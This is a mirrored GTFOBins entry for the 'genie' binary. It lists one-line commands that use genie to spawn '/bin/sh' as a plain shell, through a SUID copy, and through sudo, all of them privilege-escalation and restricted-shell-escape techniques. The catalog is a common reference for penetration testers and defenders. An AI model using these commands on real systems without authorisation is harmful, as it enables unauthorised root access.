mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
10 lines
144 B
Markdown
10 lines
144 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: genie -c '/bin/sh'
|
|
suid:
|
|
- code: ./genie -c '/bin/sh'
|
|
sudo:
|
|
- code: sudo genie -c '/bin/sh'
|
|
---
|